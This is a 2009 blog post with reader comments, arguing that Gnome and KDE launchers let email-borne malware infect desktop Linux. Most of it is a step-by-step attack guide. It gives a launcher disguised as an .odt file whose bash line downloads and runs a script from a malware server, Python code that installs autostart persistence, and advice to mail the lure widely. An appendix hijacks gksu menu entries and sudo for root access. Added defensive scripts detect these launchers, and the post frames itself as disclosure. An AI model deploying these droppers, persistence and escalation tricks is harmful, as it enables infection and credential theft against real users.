foobar on computers, software and the rest of the world


How to write a Linux virus in 5 easy steps

, posted: 11-Feb-2009 06:33

Note: I posted a follow up to summarise points and comments I received
as part of the overwhelming feedback to this article. Please read this follow-up
before (!) posting a comment, since some of what you might  want to say
may already have been addressed.

For the gist of it...

... just scroll down to the compact step-by-step guide. But if you like to get some of the background and related explanations then just read on.

 

The rumor of the bullet-proof Linux architecture

There is this rumor going around that Linux is virus free. It is said that the old-fashioned multi-user heritage of Linux (and other *nix OSs) prevents malware, since users are not normally running their programs in admin mode (as root user). We are reminded that execute bits are needed to run anything – contrary to Windows – and that execute bits aren't set on any attachments or files saved from emails or from a web-browser.

Therefore, we are told, the very architecture of Linux is so much superior to Windows that it's just not possible to successfully spread malware. Of course – it is acknowledged – a low-level bug, a buffer overflow or other issue is exploitable. But nevertheless, users can't just catch a virus by email or by downloading malware from the Internet, contrary to “those Windows users”. Linux will protect them from their own stupidity.

At least so the story goes. But sadly, that's not true. I will show how it is possible in a few easy steps to write a perfectly valid email-borne virus for modern desktop Linux. I will do so not because I want to put down Linux. Quite the opposite: I like and support Linux, which is all I'm running at home and at work. I'm a big supporter of free and open software, as readers of this blog will know. But if there are any security risks, even in my favorite OS or distribution, then they need to be discussed. Even more important: A false sense of security is worse than a lack of security. And unsubstantiated claims of superiority don't help in a reasonable discussion either.

 

Some notes before we get started

Update: There has been a lot of feedback about me using the term 'virus' not correctly here. That I should talk about a 'trojan horse' instead. There is some disagreement on whether a virus requires user interaction or not, and whether we would be talking about a worm if we are talking about malware that can spread without user interaction. There is also some disagreement on whether a malware that spreads itself via email can be considered a virus or not. There are many sources that would call such a thing a virus (an 'email virus') and others which would be more exacting in their definition. Let this article not be about that discussion. I'm calling this malware here a 'virus', even though it does require user interaction and even though I don't provide actual code for how to spread itself (that code is only provided as very high-level pseudo-code).

I should point out: The vulnerabilities we will be taking advantage of are 'features' of the most popular modern Linux desktop environments, Gnome and KDE. The actual core of Linux itself does not have any of these vulnerabilities. A Linux (or any other *nix) system without running Gnome or KDE will not exhibit any of these problems, which is one of the huge advantages of properly separating the core OS from other applications such as the desktop environment.

On the flip side, if you run those desktop environments on other OSs (maybe on FreeBSD, for example) then you possibly have to deal with the same vulnerabilities. A more accurate title for this article therefore might have been: How to write a Gnome/KDE virus in 5 easy steps. But since Gnome and KDE are predominantly used under Linux, I feel that a virus based on those vulnerabilities would impact Linux users the most. Thus, the chosen title remains valid.

The text of this article here will explain to you which steps need to be taken to infect a desktop and how to install your malware and will provide background information on why those steps are necessary and why they actually work. After the longer explanation there is a more compact step-by-step summary towards the end. Even though there are some code snippets, the article will not provide the code for a ready-made piece of malware.

Several days ago I sent a message to the security teams at Ubuntu and Fedora, asking if they would like to take a look at this before I publish. The Ubuntu team hasn't responded yet, but the Fedora team told me that this is “well-known and expected behavior” and that they have no problem with me publishing this. Well-known and expected? Really? But ok then, here we go.


Getting users to open attachments: Check out these nude shots!

If you are now looking forward to some newfangled exploit or some extra clever hackery, I will have to utterly disappoint you. What I'm showing here is merely an example of how the old-school social engineering "viruses" (they hardly deserve that name) which have been bothering the Windows world for such a long time can be made to run on Linux, or any other *nix OS with a modern desktop environment.

The premise of this type of 'virus' is simple: Get a user to run an executable attachment you sent them via email. This is completely low-tech. No black magic here. I'm not taking advantage of a new exploit in any way. To make it work in Linux I'm just using the 'features' of modern desktop environments in somewhat unintended ways, I guess. After all, it's all “well-known and expected”.

Doing this under Windows is straightforward. You create your malware as an EXE file, attach it to an email which says something like: "Whoa, check out these nude shots of ....!". The hapless user double-clicks on the attachment, which Windows – in the absence of some decent anti-virus software – will obediently execute. Before you know it the malware is installed and the system is owned. The execution of .EXE files from within email clients under Windows is of course also “well-known and expected”.

You think this is not possible under Linux? Of course it is. It just requires one or two more steps. However, there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance, which is of course the main ingredient in any attack vector like this.

There is just one small stumbling block, which needs to be overcome. Well, two, actually.

Firstly, most email clients for Linux will not execute attachments. They might try to open them if the extension indicates a known document or media type (.pdf or other documents, for example). But that's about it. So, let's say you have written your malware as a nice Python script. In that case, your script may have the .py ending, but the email client is still unlikely to invoke the Python interpreter for you. You would have to go out of your way to configure your system to do that, and who would do something like this?

No, we need a slightly different approach. Something that always gets executed when clicked on. And here then is one more step that needs to be taken by the user, which might reduce the success rate of this attack vector a little. The user has to first save the attachment and then double click on it. Because while the email client typically cannot run an executable file, the desktop environment very well can as we will see. So, the email will have to read something like:

Whoa, check out these nude shots of...!

(if the attachment doesn't want to open just save it to your desktop and open it...)

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere. Besides, many users of web-based email clients are used to the save-first routine anyway.


Do not underestimate user ignorance – even on Linux

You might argue that most Linux users tend to be a bit more aware of what they are doing. They usually had to make a conscious choice about their OS and therefore tend to not be your typical non-technical user. But that is changing! Some netbooks are shipped with Linux as default. In that case users may not have consciously chosen Linux and thus can be just as blissfully ignorant as those Windows users who click on email attachments. Also, some large organizations are thinking about mass Linux desktop roll-outs. Various cities and governments around the world, for example. The users there are not technical either and are just as likely to click on attachments.

Furthermore, the trouble free times of the past have given Linux users another false sense of security. We are so used to the constant mantra of "Linux is so secure, you don't even need anti-virus software!" that we probably really don't have any anti-virus software to catch us when we are about to do something dumb.

Ok, back to the technicalities. Most email clients save attachments to the desktop of the user or in the user's download directory where the user will then go look for it. So, if the user doesn't endlessly examine the attachment but simply clicks the 'save' button in the email client then that usually does the trick: The attachment will be right there in the face of the user. In fact, I noticed that for some reason my Evolution email client sometimes has issues opening even normal documents as attachments directly. For example, someone sends me an .odt file but Evolution sometimes doesn't start OpenOffice for me. So, whenever this doesn't work, I just save and open it then. I'm already trained to do this kind of stuff! I'm probably not the only one.

 

Getting attachments to execute

We said earlier that attachments are not normally run when they are stored as files. There is no standard file extension that indicates that a file should be executed when clicked, as there is under Windows. Instead - and this is the second big hurdle we need to overcome - for the file to be executable under Linux (or any other *nix OS), the execute flag would have to be set in the permissions of the file. This is something that Windows doesn't have, and which is often seen as one of the reasons why infecting a Windows PC can be so easy, and why it should be close to impossible on *nix systems. When you save an email attachment under Linux, the execute flag is normally NOT set and thus, the file can't be executed just by clicking on it. So, no luck?

Not so fast. Modern desktop environments, such as Gnome and KDE, conveniently offer a nice "workaround" called 'launchers'. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don't have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. Now we are getting somewhere!

A problem we are now facing is that the command that can be executed by a launcher is really just one line and just one command. It's a bit tough to install malware with just a single command. Or is it? How about this here:

% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

What does this single command do? It starts bash, a command shell (part of any default install), and passes a string argument with two simple commands to it, which bash will then execute. The first command (curl) downloads a script from some malware server you have to set up and then stores the script in a place where we know that we can write to (the /tmp directory). Note that on some systems (Ubuntu, for example) you don't have curl, but a similar command called wget. That complicates the actual command line here a little bit, but it's not an insurmountable problem, as shown in the step-by-step guide further down. The second command (the call to the Python interpreter) then executes that freshly downloaded script (a Python script in this example). Both Python and curl (or wget) are typically part of the default install of most Linux distros.

If we put this into the Exec line of the launcher definition then a simple click on that launcher will lead to the execution of a single command, which in turn executes two commands, which then lead to the download and execution of an arbitrary complex script. All without the execute bit being set anywhere.


You don't need to be root to 0wn someone

None of that so far required root privileges. And our script can now do whatever it wishes to do within the confines of the user account. Confined it may be, but that doesn't prevent significant damage from being done.

For example, it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email. It can install a Firefox extension that captures passwords as the user types them. It may start to share the user's desktop via VNC without the user's knowledge. It can start a background daemon that pops up ads. Linux adware!

All of this is executed as a normal user process. Truly, on a desktop system that is normally used by a single user, owning that user account is pretty much equivalent to owning root as far as doing damage is concerned: All the action you are interested in takes place in the user account anyway.

But maybe you really want to have root for your malware? Well, there's a way to do that as well, but this is not guaranteed to work in all cases and is frankly not necessary to successfully infect a machine. So, to not distract from the important points of this article here, I have a discussion of that in an appendix.


Autostart after reboot

But surely, even if the user is not able to find the running process and kill it then just a simple reboot will stop that nonsense right? Surely, root privileges are needed in order to force our malware to be automatically launched in case of a system restart, right?

Not so. Users do not need root privileges in order to configure certain applications for autolaunch when they are logging into their own user sessions. That is because they are only making changes to their own session and user account, not the underlying system settings. Again, any apps started as part of the user session will only run at the user's privilege level, but as we have seen, this is not a major problem. Lots of interesting things can be done even then.

So, how do we get ourselves to be auto started when the user logs in? There are a number of scripts that get executed when you start a shell, but the user that's likely to click on a suspicious attachment is not likely to start a shell very often if at all. Fortunately, the modern desktop environments have their own set of commands which they are autostarting on login. In the case of Gnome, take a look at what you find in ~/.config/autostart (this directory may not exist yet, if you have not configured any apps for autostart). That's right! More launchers! Those are run every time the user logs into Gnome. For KDE it's even simpler: Just link to your executable from within the ~/.kde/Autostart directory.

Our malware then only needs to create an appropriate entry in those directories and it will start to run whenever the user logs in!

And that's all there is to it. I leave the writing of the actual malware script as an exercise to the reader.


Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

  1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

  2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

    For example, to create the shortcut for KDE, all you need to write in Python is:

       import os
       home = os.path.expanduser("~")   # os.getlogin() fails without a controlling tty, e.g. when started from a launcher
       drop_dir = home + "/.kde/Autostart"
       if not os.path.isdir(drop_dir):  # may not exist yet
           os.makedirs(drop_dir)
       link = drop_dir + "/s.py"
       if not os.path.lexists(link):
           os.symlink(home + "/.local/.hidden/s.py", link)


    For Gnome the Python script instead needs to write a launcher into the proper directory:

       import os
       home = os.path.expanduser("~")   # os.getlogin() fails without a controlling tty
       relauncher_str = "\n".join([
           "[Desktop Entry]",
           "Type=Application",
           "Name=Malware",
           "Exec=python %s/.local/.hidden/s.py" % home,   # absolute path: don't rely on the session's working directory
           "Icon=system-run",
           "",
       ])
       drop_dir = home + "/.config/autostart"
       if not os.path.isdir(drop_dir):  # may not exist yet
           os.makedirs(drop_dir)
       f = open(drop_dir + "/Malware.desktop", "w")
       f.write(relauncher_str)
       f.close()


    Writing these autostart entries is probably some of the first action that your malware should perform.

  3. Now create a desktop launcher file for the installer of the malware, which is different from the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

       [Desktop Entry]
       Type=Application
       Name=some_text.odt
       Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP ; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi ; python $DROP/s.py'
       Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

    Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and choose one of the appropriate standard image icons.

    The Exec line is a bit longer now, because we have to account for the possibility that either wget or curl is installed. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. Note that the Exec value has to stay on a single line in the launcher file. I'm not a bash expert, so there might be a more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is typically wiped on reboot.

    Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

  4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

  5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.

That was easy, wasn't it?


Solutions for the problem

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.
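One way to act on that advice before the user is ever tempted is to stop launchers at the mail gateway or in the mail client. The following is an added example written for this edit, not code from the post: it uses Python's standard email module to walk the attachments of a message and flag any that are .desktop launchers, either by extension (a double extension such as some_text.odt.desktop still ends in .desktop) or by content (a file whose body starts with [Desktop Entry], whatever it is called). The sample message, its addresses and the attached launcher are constructed for the example.

```python
"""Flag e-mail attachments that are freedesktop launchers, whatever their file name claims.
Added example for a mail-gateway or mail-client check; not code from the post."""
import email
from email import policy
from email.message import EmailMessage

LAUNCHER_EXTENSIONS = (".desktop", ".directory")

def looks_like_launcher(filename, payload):
    """True if the attachment is a launcher by name or by content. A double extension such
    as some_text.odt.desktop still ends in .desktop; the content check catches a launcher
    renamed to look like an image or document."""
    if (filename or "").lower().endswith(LAUNCHER_EXTENSIONS):
        return True
    head = payload[:4096].lstrip()
    return head.startswith(b"[Desktop Entry]") or b"\n[Desktop Entry]" in head

def suspicious_attachments(raw_message):
    """Return [(filename, reason)] for every attachment that is a launcher."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        if looks_like_launcher(filename, payload):
            by_name = filename.lower().endswith(LAUNCHER_EXTENSIONS)
            hits.append((filename, "extension" if by_name else "content"))
    return hits

def build_sample_message():
    """Constructed message (not a real capture): the article's lure with a launcher attached
    under a document-looking name, a harmless PDF stub, and the same launcher renamed to .jpg."""
    launcher = (b"[Desktop Entry]\nType=Application\nName=some_text.odt\n"
                b"Exec=bash -c 'curl http://www.my_malware_server.com/s.py -o /tmp/s.py; python /tmp/s.py'\n")
    msg = EmailMessage()
    msg["From"], msg["To"] = "sender@example.com", "victim@example.com"  # placeholder addresses
    msg["Subject"] = "Whoa, check out these nude shots!"
    msg.set_content("If the attachment doesn't open, just save it to your desktop and open it there.")
    msg.add_attachment(launcher, maintype="application", subtype="x-desktop",
                       filename="some_text.odt.desktop")
    msg.add_attachment(b"%PDF-1.4 (placeholder)", maintype="application", subtype="pdf",
                       filename="invoice.pdf")
    msg.add_attachment(launcher, maintype="application", subtype="octet-stream",
                       filename="photo.jpg")
    return msg.as_bytes()

if __name__ == "__main__":
    for filename, reason in suspicious_attachments(build_sample_message()):
        print("launcher attachment: %s (detected by %s)" % (filename, reason))
```

Whether to strip, quarantine or merely tag such a message is a policy choice. The content check matters because renaming the attachment away from .desktop costs the sender nothing, while the receiving side commonly sniffs a file's type from its contents as well as from its name.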

Secondly, a step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop, a user can't just click on it and start it if the execute bit is not set.

Thirdly, stop perpetuating the myth that malware and viruses are only a problem for Windows. Linux is – in principle – vulnerable as well, of course. Even though users don't operate with root privileges, if they inadvertently execute a bit of malware then a lot of damage and autostart installation can still be done. The simple fact that an executed attachment won't run as root is NOT a useful protection against much of anything, as we have seen. The fact that attachments are not saved with the execute bit is NOT a sufficient protection either, since modern desktop environments allow you to neatly maneuver around that.

Right now the limited market share of Linux on the desktop offers some protection. The overall better security architecture offers some more protection. But none of that is fool-proof. And with larger Linux deployments in interesting locations – such as government organizations – those installations also become interesting targets for malware authors.


Thunar?

Interestingly, the Thunar file manager under xfce (Xubuntu 8.10) is doing something that Gnome's and KDE's file managers are not doing: It will flag the desktop launcher file as potential malware and thus prevent execution via a simple click. This works whether the attachment was saved from within Thunderbird or from within a web-based email system, such as Yahoo Mail. Does anyone know what Thunar specifically does here to come up with the 'malware' conclusion?

However, I confirmed that it works with fresh, stock Ubuntu 8.10, Kubuntu 8.10 and Fedora 10 installs. Since this is mostly based on the functionality of Gnome and KDE, I assume that most distributions that utilize those desktops are vulnerable as well.


Bootnote

Some time ago there was a challenge issued to write a virus that would be able to infect a desktop Linux system. The original challenge contained two important caveats, though: Firstly, it should be able to infect the machine of the person who wrote the challenge. Nothing further is known about that machine. For example, we don't know which desktop he was running. Secondly, the virus should be able to write a file into the /etc directory, to which normally only root has access.

I would contend that a Linux virus can be called successful if it is able to infect standard installs of some of the most popular distros. I know that the approach I am suggesting will be able to infect a standard install of Ubuntu, Kubuntu and Fedora, for example.

Secondly, as outlined above, getting root privileges is not necessary to successfully infect a Linux computer. Well, it's more the account of the user that is infected, isn't it? However, if we are talking about desktop computers then for the most part there is only going to be a single user. The distinction between infecting the system (as root) or the user account (as the user) is entirely academic at best. Such an infection is in effect the same as saying 'the machine is infected'. After all, the user is mostly logged in and the malware will run whenever that is the case. Anyway, I contacted the author of this challenge and explained the situation to him. He insists on the original rules laid out in his challenge, though. Fair enough, it's his challenge and therefore his rules.

So, what if you really want root then?

 

Appendix: Getting root

Getting root privileges is always considered to be a bit of the holy-grail of compromising another machine. As we have seen, not having it isn't really preventing you from having yourself a good time with a virus, though. But just for completeness' sake, let me outline a way for your malware to get root. There might be other ways, but this is what I could come up with for now.

You see, even normal desktop Linux users will occasionally do stuff as root. In the case of Ubuntu, for example, you will use 'sudo' (or the graphical equivalent gksu) from time to time in order to perform system administration. Maybe to administer users, change the date and time or to install new software. Many items in the System -> Administration menu will prompt you for your password for that reason. By default, the user of a Ubuntu desktop system tends to be in the 'admin' group, which in turn is mentioned in /etc/sudoers. Thus, by providing your own password you can perform tasks with root privileges.

So, now how can we take advantage of this? It turns out that the menu items for your Gnome desktop are individually configured somewhere. Maybe we can hack that so that our nice malware is started instead of synaptic (the graphical package manager) or any other utility that runs under sudo or gksu, after the user has provided their password? But as it turns out, the menu items are defined in a place to which only root has write access. Take a look at /usr/share/applications. In there you find – again – a large number of launcher files. These are defining the various menu items. For example, take a look at synaptic.desktop. You can see there the following line:

Exec=gksu /usr/sbin/synaptic


Yes, so if we could just go ahead and edit that, right? If our malware could go and change that to:

Exec=gksu python .local/.hidden/s.py /usr/sbin/synaptic

That would execute our malware with root privileges. Note that we quietly passed the original name of the executable (/usr/sbin/synaptic) to our malware, so that it can start synaptic after it is done permanently giving itself root privileges or doing whatever it wants to do as root. That way the user won't become suspicious.

But, alas, we can't edit that file. Out of luck again? Fortunately, no. Gnome is kind enough to see if we might have a local definition of one of those desktop files, which should override the system-wide settings. Those go into ~/.local/share/applications. So, you can simply copy the synaptic.desktop file from /usr/share/applications to ~/.local/share/applications and perform the changes you want on it. Then you just have to sit back and wait for the next time the user starts synaptic and you are in business.

Of course, you don't have to limit yourself to synaptic. To have a better chance of being executed with root privileges, any of the apps in the Administration menu that require gksu are fair game. And frankly, you can probably make similar changes and introduce gksu to many of the menu items in System -> Preferences. As a Ubuntu user you are used to giving your password to gksu from time to time. If the user doesn't pay attention, they won't even notice that they were just prompted for their password by a utility that never asked for the password before.

And for those users that like to use the shell: Well, in that case the malware can simply mess with your path definition and place a 'tuned' version of the 'sudo' command in your path, which gets executed whenever you type 'sudo'.

As you can see this is not guaranteed to give you root (if the user never uses those programs), but there's a good chance that you will get it eventually if you are patient.
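The tricks described in the step-by-step guide, in the solutions section and in this appendix all leave traces in the per-user launcher directories, which means they can be audited there. The following script is an added example written for this edit, not the author's code and not part of any distribution: it parses .desktop files with a small parser for the [Desktop Entry] group and flags a launcher whose Name ends in a document or image extension, an Exec line that hands a shell a one-liner containing curl or wget, a payload path inside a hidden directory, a launcher without the execute bit (the check the author asks Gnome and KDE to enforce), and a per-user launcher in ~/.local/share/applications that shadows a system launcher of the same name, in particular one where gksu/sudo now wraps a different target, or where a privilege wrapper was added to an item that never had one. The directory list, the heuristics and the sample launchers are assumptions and constructed data for the example, not something captured from a real system.

```python
"""Audit freedesktop .desktop launchers for the tricks described in the article: disguised
name, download-and-run Exec, hidden payload path, missing execute bit, shadowed system launcher."""
import os
import re
import shlex

DOC_EXTENSIONS = (".odt", ".doc", ".pdf", ".jpg", ".jpeg", ".png", ".gif", ".txt")
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "dash", "zsh"}
PRIV_WRAPPERS = {"gksu", "gksudo", "kdesu", "kdesudo", "sudo", "pkexec"}
# Per-user launcher locations the article discusses, relative to $HOME (assumed list).
USER_LAUNCHER_DIRS = ("Desktop", ".config/autostart", ".kde/Autostart", ".local/share/applications")
SYSTEM_APP_DIR = "/usr/share/applications"
HIDDEN_PATH = re.compile(r"(^|[/\s])\.[^/.\s]")  # a dot-file or dot-directory inside a path

def parse_desktop_entry(text):
    """Minimal parser for the [Desktop Entry] group: '#' comments, [group] headers and
    Key=Value lines. Values are kept verbatim (field codes such as %U are not expanded)."""
    entries, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group == "Desktop Entry" and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries

def exec_words(exec_value):
    try:
        return shlex.split(exec_value)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return exec_value.split()

def audit_entry(entries, executable=None, system_entries=None):
    """Return (code, detail) findings for one parsed launcher. executable: result of the
    execute-bit check (None = unknown); system_entries: the same-named system launcher, if any."""
    findings = []
    if entries.get("Type") != "Application":
        return findings
    name, exec_value = entries.get("Name", ""), entries.get("Exec", "")
    words = exec_words(exec_value)
    argv0 = os.path.basename(words[0]) if words else ""
    if name.lower().endswith(DOC_EXTENSIONS):
        findings.append(("disguised-name", name))
    if argv0 in SHELLS and "-c" in words:  # shell one-liner: look for a downloader inside it
        body = " ".join(words[words.index("-c") + 1:])
        tools = {os.path.basename(t) for t in re.findall(r"[\w./-]+", body)}
        if tools & DOWNLOADERS:
            findings.append(("download-and-run", sorted(tools & DOWNLOADERS)))
    if HIDDEN_PATH.search(exec_value):
        findings.append(("hidden-path", exec_value))
    if executable is False:  # the desktop runs it anyway, which is the whole problem
        findings.append(("no-exec-bit", name))
    if system_entries is not None:
        sys_words = exec_words(system_entries.get("Exec", ""))
        if sys_words and sys_words != words:
            findings.append(("overrides-system-launcher", system_entries.get("Exec")))
            if argv0 in PRIV_WRAPPERS and os.path.basename(sys_words[0]) not in PRIV_WRAPPERS:
                findings.append(("privilege-wrapper-added", argv0))  # new password prompt
            elif argv0 in PRIV_WRAPPERS and words[1:2] != sys_words[1:2]:
                findings.append(("privileged-target-changed", words[1:2]))
    return findings

def read_entry(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return parse_desktop_entry(f.read())

def audit_file(path, system_dir=SYSTEM_APP_DIR):
    """Audit one launcher on disk: execute bit, plus shadowing of a system launcher."""
    system_path = os.path.join(system_dir, os.path.basename(path))
    system_entries = read_entry(system_path) if os.path.isfile(system_path) else None
    return audit_entry(read_entry(path), os.access(path, os.X_OK), system_entries)

def audit_home(home=None):
    """Walk the per-user launcher directories; return {path: findings}."""
    home, report = home or os.path.expanduser("~"), {}
    for rel in USER_LAUNCHER_DIRS:
        directory = os.path.join(home, rel)
        for entry in (sorted(os.listdir(directory)) if os.path.isdir(directory) else []):
            path, findings = os.path.join(directory, entry), []
            if os.path.islink(path) and HIDDEN_PATH.search(os.readlink(path)):
                findings = [("link-to-hidden-path", os.readlink(path))]  # KDE-style autostart link
            elif entry.endswith(".desktop") and os.path.isfile(path):
                findings = audit_file(path)
            if findings:
                report[path] = findings
    return report

# Constructed samples (not captured from a real system) mirroring the article's launchers.
SAMPLE_DROPPER = """[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP ; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi ; python $DROP/s.py'
"""
SAMPLE_SYSTEM_SYNAPTIC = "[Desktop Entry]\nType=Application\nName=Synaptic Package Manager\nExec=gksu /usr/sbin/synaptic\n"
SAMPLE_HIJACKED_SYNAPTIC = SAMPLE_SYSTEM_SYNAPTIC.replace(
    "Exec=gksu /usr/sbin/synaptic", "Exec=gksu python .local/.hidden/s.py /usr/sbin/synaptic")
```

Run audit_home() as the user being checked; audit_entry() can also be fed any parsed launcher directly, which is how the samples are exercised. The heuristics are deliberately narrow and will also flag a legitimate launcher that runs a shell one-liner with wget, so treat the output as a review list rather than a verdict. The one check that needs no heuristic at all is the execute bit: if the desktop refused to run launchers without it, the attachment trick in this article would stop at the first click.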

Update, Feb 12, 2009: It would really have surprised me if I were the first person to think of this vulnerability. Looking around a little on the Internet, I couldn't find any references to this, though. Well, the editor of LWN.net did a better job. As he points out here, there has been discussion about the vulnerabilities introduced by .desktop files back in 2006 already.

 


 











Comment by EvilPixieMan, on 11-Feb-2009 08:05

"Therefore, we are told, ... that it's just not possible to successfully spread malware."

"But nevertheless, users can't just catch a virus by email or downloading malware from the Internet, contrary to "those Windows users". Linux will protect them from their own stupidity."

What rubbish - "We are told" by whom? You conveniently invent an imaginary rumour, and are then able to debunk it. Bravo for you!

I can see that you are trying to educate users that just by running Linux they shouldn't think they are immune to malware. Well if you're trying to educate, its not good practice to base the lesson on misinformation -

1. I don't know where you got the rumor that Linux is free from trojans.

2. Be clear about the difference between a trojan and a virus.

Linux has a better rep on the virus front, but _ANY_ modern user-oriented OS will run an application that a user requests it to run, so ALL are to some extent susceptible to trojans (It is actually more a function of the email client behaviour, and how "easy" it makes it to execute code). That is the thrust of your article, you didn't need to waffle on for so long to prove that point.


Comment by herghost, on 11-Feb-2009 08:26

Excellent, eye-opening article.

Alas, I am (was?) one of the people who fell for the "linux is virus-free" mantra. And this is the key point, and you make it very well: if every new user is indoctrinated to believe what is effectively only technically true as soon as they join the community then the potential for being exploited is massive.

Someone needs to take a long hard look at whether these "convenience factors" are causing more harm than good.


Author's note by foobar, on 11-Feb-2009 08:38

@herghost: Thank you for the feedback. Yes, the convenience factors are the problem here. They could easily be circumvented by requiring execute bits on the launchers. You are right: New users will often think that under Linux they don't have a virus problem, and that ... can be a problem.


Author's note by foobar, on 11-Feb-2009 08:51

@EvilPixieMan: It's my blog, so I "waffle on" for as long as I want. If you don't like it ... you know what you can do.

You don't know where I get the rumour that Linux is malware free? There are many people claiming that viruses and malware are not much of an issue on Linux. There are also other people pointing out that it is of course not 'free' of those things, but clearly the prevailing opinion is that email borne malware is not much of an issue on Linux.

Read the opening paragraph here: http://en.wikipedia.org/wiki/Linux_malware

Also, read this for the typical take on this: http://linuxmafia.com/~rick/skoll/anti-virus.php

And yet another one: http://linuxmafia.com/~rick/faq/index.php?page=virus#virus

Or point three in this one: http://pcsplace.com/linux/10-reasons-to-switch-over-to-linux-from-windows/

That's just a small sample.

As far as the virus/trojan differentiation is concerned: I am aware of that. Having been in the security industry for some number of years, I also know that the press has hopelessly muddled that distinction. While there used to be a differentiation based on whether the malware required human interaction or not, whether it was taking advantage of a vulnerability or user-stupidity, etc. ... all those useful distinctions have been lost or messed up. Thus, I just stuck with the nowadays 'generic' name: Virus. Note that I wrote "they hardly deserve that name".


Comment by freitasm, on 11-Feb-2009 08:53

Hmmm. Like the good old .PIF files then?


Author's note by foobar, on 11-Feb-2009 08:57

@freitasm: Yes, a little bit like a PIF file, I guess.


Comment by freitasm, on 11-Feb-2009 09:00

@EvilPixieMan it is the "sell line" of every Linux defender I know. When I tell someone to update their Windows systems, the first thing I hear is "you wouldn't need this with Linux". It's too early in the morning to go with more examples, but in general everyone I know using Linux will say it's a safe OS, when we all know there isn't such a thing as a 100% safe software.

Example of this is when Microsoft issues the monthly updates. I tell people "I've updated [x] number of machines at home and servers" and the immediate response is "we don't have to worry about this with Linux". Then I point to a list of security vulnerabilities from the vendors and they change subject.

Too bad people want to be blind...


Comment by David F. Skoll, on 11-Feb-2009 09:05

Hello,

I wrote the original challenge. This is an interesting attack, and it reaffirms my decision not to use either KDE or GNOME.

Also, is it really true that most GNOME and KDE email clients save to your Desktop directory? (I don't know; I don't use such clients.)

There are also a few more hoops to run through than for the average Windows virus, plus the little matter of getting a useful local root exploit, so I think Linux is still relatively safe. Nevertheless, this does serve as a cautionary note for "Desktop Environment" developers and users.


Author's note by foobar, on 11-Feb-2009 09:12

@freitasm: You are right: The security of Linux is always mentioned as a good reason to switch. And in fact, I still agree with that argument. I believe that Linux itself is definitely much more secure (note how these vulnerabilities are in Gnome and KDE, not in Linux itself). There is noticeably less malware out for Linux. There are several reasons for that:

 * Linux as the core OS is more secure.
 * There is much more diversity in the potentially more vulnerable desktop environments.
 * Linux has a smaller market share.

The second point is often overlooked: Whatever works on one version of Linux doesn't work on the other. Linux has a small market share, but those who run Gnome and KDE have an even smaller percentage of that, and so on. And servers, which don't run a desktop component, are very secure indeed.

